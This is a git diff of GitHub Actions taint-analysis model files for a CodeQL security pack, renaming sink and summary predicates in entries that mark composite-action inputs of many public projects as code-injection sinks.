a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4..f04f8dda6c8 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d9..a37d6452d50 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d65724735..352eb51996a 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a12..44f34c11cb3 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc2187..3fd2e46296a 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e5..881374b6c90 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad1..6d77c866dc2 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48..0b27c584584 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4..911d3e57155 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a..1ac668cf55a 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fff..5cf121dcef2 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17..d946204e9b9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f..c6839a7b004 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2..9e708bbcc89 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c1560..cfb67540b17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e..7186433e6d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e6..d39aafe162f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a..a3b53b3ec96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf..2a35d22a10e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900..156d244ece2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e..fcda4b3dfec 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761f..84877f57d8c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a..dcb93d013a0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fc..4776bb79067 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a..2540e6a76ca 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b725..525064de6a9 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a1..b46d5a3ee6a 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e5158390..631457c813e 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a0592..44d9eb10a0d 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762db..0d7f80698f5 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220..84caa043484 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005ed..f6aed253a21 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd8..1eac49617f2 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220..1efa6815c28 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 53c6258551f..91463a305dd 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 62a4f2bbcd7..7ef240ad999 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 6dffbff40d3..db953acf5bc 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index ac72bb9ebf0..7c1b01e14b5 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index b3f1ca67eef..37b67a933a3 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 44f5ad66096..570a9bdd142 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index c2e56f7e175..8c1993c47ca 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index 54d0c8b2fe0..ee0adaadb3e 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index b1914e7a96b..c127f03bb66 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index dd66f206ee9..3b3d60fadd0 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 0c26f02e6d8..4dd43acd2c5 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 2ee13115d6d..cb4bff25f9a 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index c76ed5b6604..39a204389b9 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 0bdf2087b46..6b4192c0c61 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index bb83a5964e7..63c3fc89058 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index f29c52b1bf5..72772ae47cf 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: 